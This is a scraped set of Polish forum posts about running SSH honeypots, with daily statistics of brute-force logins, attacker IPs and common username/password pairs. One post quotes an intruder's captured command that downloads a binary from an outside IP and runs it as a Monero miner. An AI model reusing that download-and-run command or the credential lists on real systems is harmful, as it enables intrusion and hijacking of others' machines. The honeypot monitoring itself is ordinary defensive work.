Witam wszystkich i proszę o jakąś pomoc, mam problem z Cloudflare, a raczej to oni mają problem ze mną ( ͡° ͜ʖ ͡°). Od jakiegoś czasu wyświetla mi się ich captcha. Powód jest oczywiście taki że ktoś korzysta z mojego adresu ip do spamowania i innych złych uczynków. Na stronie Project Honey Pot oraz innych tego typu serwisach moje ip figuruje na blacklist. Przeskanowałem każde urządzenie w domu
@98f1c6tdg24 ja tak kiedyś mialem, że co chciałem coś wpisać w Google, to pojawiała mi się capcha z informacją, że z mojego adresu było za dużo zapytań. Wtedy zadzwoniłem i zmienili, chyba w ciągu doby.
#sysop #honeypot #linux #seciurity #centos #sshd #ssh

https://www.youtube.com/watch?v=ZemMHI_HcmM

W związku z zainteresowanie popełniłem video tutorail jak postawic honeypot w kwadrans .
Wybaczcie chaotyczne przedstawienie nadmiar wyrazów dźwiękonaśladowczych, sapanie oraz błędy nazewnictwa to mój pierwszy taki wyczyn. Jak kogoś drażni audio polecam funkcje mute im dalej tym nie lepiej :)

Wołam:
w nawiazniu

@Szala @dev-ops @kfasio @GRBAS
#linux #honeypot
Przedwczoraj do na honeypot ssh wpadł pierwszy #miner

#cd /tmp; ps -ef | grep sfs | grep -v grep | awk '{print $2}' | xargs kill -9;ps -ef | grep sfs | grep -v grep | awk '{print $2}' | xargs kill -9; ulimit -n 150000; wget -O sfs [http://185.174.172.18/sfs;chmod](http://185.174.172.18/sfs;chmod) 777 sfs;./sfs -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u richard.melony@openmailbox.org -p x >/
dev/null 2>&1 &; ps -ef | grep rrr |
dzaku - #linux #honeypot 
Przedwczoraj do na honeypot ssh wpadł pierwszy #miner 

...

źródło: comment_hj3rELFKoqNAdFIAof2YZ8NxUaKQbbid.jpg

Pobierz
#linux #ssh #honeypot

Wystawiłem małego honeypota na publicznym ip nie zindeksowanym jeszcze w shodan .

Oto efekt po okolo 24 h , 1231 prób logowania po ssh
10 najpopularniejszych loginów z hasłem :
ILOŚĆ [USER / PASSWORD]
42 [service/service]
28 [admin/12345]
24 [pi/raspberry]
23 [support/support]
23 [admin/password]
22 [admin/admin123]
21 [usuario/usuario]
21 [admin/motorola]
19 [admin/default]
18 [admin/pfsense]

Pełen rank:
https://da.gd/3iJLF

Na które konto/haslo otwieramy wjazd ? ( ͡° ͜ʖ ͡
dzaku - #linux #ssh #honeypot

Wystawiłem małego honeypota na publicznym ip nie zin...

źródło: comment_TAmShpdxicfEionhFaKAybhug8uNvbBw.jpg

Pobierz
@dzaku: Tu masz słownik z mojego hoenypota: https://pastebin.com/NhX8GrZn

==> analizaloginow <==
18 student
23 nagios
24 oracle
24 user
35 guest
62 ubnt
78 test
96 admin
1385
37007 root

==> proba
atakperdzien <==
22 2015-02-09
23 2015-02-11
2471 2015-02-10
6699 2015-02-16
7656 2015-02-12
8369 2015-02-15
8491 2015-02-14
9609 2015-02-13
@redcat7: Jak odpisujesz to klikaj odpowiedz, no chyba, że nie zależy ci, żeby to co piszesz dotarło do adresata ;P

Dla mnie takie rozwiązanie, o jakim mówisz wydaje się trochę zbyt bezwzględne, zresztą dla ciebie to są wpisy z dupy, a dla mnie np. jest za dużo polityki i jakby wszystkich tych narzekających i tych co dodają politykę tam wrzucić to nie byłoby niczego. Bo ludzie wrzucający politykę, wrzucają na wykop
Statystyki z dnia 26.11.2015

### TOP 5 ###

-- PERIOD --

== First login: 001906
== Last login: 233239

-- IP --

4 222.186.56.38
8 124.74.213.36
18 202.194.40.14
43 74.208.221.217
68 91.105.139.62

-- LOGINS --

3 ubnt
8 user
12 admin
31 root
74

-- PASSWORDS --

4 1234
4 12345
6 root
8 admin
74

-- COMBOS --

3 root,admin
3 root,password
3 ubnt,ubnt
5 root,root
74

-- COUNTRY --

1
Statystyki z dnia 25.11.2015

### TOP 5 ###

-- PERIOD --

== First login: 004210
== Last login: 165122

-- IP --

1 60.176.69.43
1 91.236.74.164
3 183.152.53.125
54 222.186.21.100

-- LOGINS --

1
1 admin
2 ubnt
55 root

-- PASSWORDS --

1 zxcv
1 zxcv1234
1 zxcv4321
1 zxcvasdf
2 ubnt

-- COMBOS --

1 root,zxcv
1 root,zxcv1234
1 root,zxcv4321
1 root,zxcvasdf
2 ubnt,ubnt

-- COUNTRY --

1 PL
9
Statystyki z dnia 24.11.2015

### TOP 5 ###

-- PERIOD --

== First login: 031943
== Last login: 225449

-- IP --

2 220.191.102.210
2 37.48.65.72
2 60.176.69.43
13 85.17.236.180
18 31.63.246.171

-- LOGINS --

1 support
1 ttf
1 zhangyan
3 admin
25 root

-- PASSWORDS --

1 tyw7VSvc
1 wsad
1 zhangyan7tian
4 admin
4 root

-- COMBOS --

1 support,supp0rt!@#
1 ttf,skilodudecta
1 zhangyan,zhangyan7tian
3 admin,admin
4 root,root

--
Statystyki z dnia 23.11.2015

### TOP 5 ###

-- PERIOD --

== First login: 001633
== Last login: 234125

-- IP --

8 212.129.9.197
12 94.102.60.177
16 115.85.192.40
161 61.147.70.112
603 222.186.21.100

-- LOGINS --

2 support
4
7 ubnt
10 admin
779 root

-- PASSWORDS --

4
4 123456
7 ubnt
8 root
9 admin

-- COMBOS --

3 root,admin
4
6 admin,admin
7 ubnt,ubnt
8 root,root

-- COUNTRY --

1
Statystyki z dnia 22.11.2015

### TOP 5 ###

-- PERIOD --

== First login: 000346
== Last login: 112114

-- IP --

6 158.69.212.206
10 184.172.196.107
22 218.200.188.213
27 94.102.53.193
707 217.144.201.243

-- LOGINS --

2 default
2 ftpuser
4 admin
5 pi
714 root

-- PASSWORDS --

2 nexus
2 password
2 root
2 user
2 zxcvbnm

-- COMBOS --

1 wildfly,wildfly
1 xxxxxxxx,1111111111111
2 root,abc123
2 root,password
2 root,zxcvbnm

--